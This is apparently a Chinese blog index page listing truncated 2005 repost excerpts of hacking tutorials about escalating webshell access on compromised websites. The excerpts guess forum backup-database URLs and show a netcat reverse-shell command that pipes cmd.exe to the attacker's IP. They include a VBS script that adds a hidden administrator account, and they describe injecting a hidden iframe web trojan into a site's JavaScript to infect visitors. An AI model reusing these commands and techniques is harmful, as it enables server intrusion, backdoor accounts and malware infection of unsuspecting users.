Hack
whjtoby
这个作者很懒,什么都没留下…
展开
-
WEBSHELL 提权思路
哈!发现DVBBS7.1 论坛前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看!dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库!没办法,试试!http://www.xxxx.com/bbs/databackup/20050406.mdbhttp://www.xxxx.com/bbs/databackup/20050转载 2005-06-18 20:58:00 · 1072 阅读 · 0 评论 -
通杀网页源代码加密
在地址栏或按Ctrl+O,输入:javascript:s=document.documentElement.outerHTML;document.write();document.body.innerText=s;源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果.转载 2005-06-01 12:55:00 · 1541 阅读 · 0 评论 -
webshell里nc反向连接获得cmd shell的方法
在webshell里操作CMD很不爽,直接上传一个nc,打入以下命令:nc -vv 你的IP地址 8000 -e cmd.exe然后在本机用nc监听一个端口,命令如下:nc -vv -l -p 8000稍微等下,就会连接一个shell了.补充:以上只是示范命令,实际操作如在海洋2006里的WScript.Shell程序运行器中,一定要输入nc的绝对路径!例子:路径:E:/wwwroot/www/c转载 2005-06-16 12:07:00 · 2849 阅读 · 0 评论 -
vbs脚本加启动项提升webshell的管理权限
1.先用TXT文件写个shell.vbs,添加一个管理员,代码如下:on error resume nextset shell=createobject("wscript.shell")shell.run"cmd.exe /c net user ray$ /del",false,falseshell.run"cmd.exe /c net user ray$ 1984 /add",false,fal转载 2005-06-16 12:09:00 · 1629 阅读 · 0 评论 -
网页木马收肉鸡隐藏一个框架网页
有了WEBSHELL拉,可以修改主页了,想在上面挂个网页木马收肉鸡,我这里有个很巧妙的方法,大家说的挂马也就是在页面上隐藏一个框架网页..... 先找找主页里面是否有JS的脚本,找到script language="javascript" src="xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)document.write(h转载 2005-06-16 12:22:00 · 1390 阅读 · 0 评论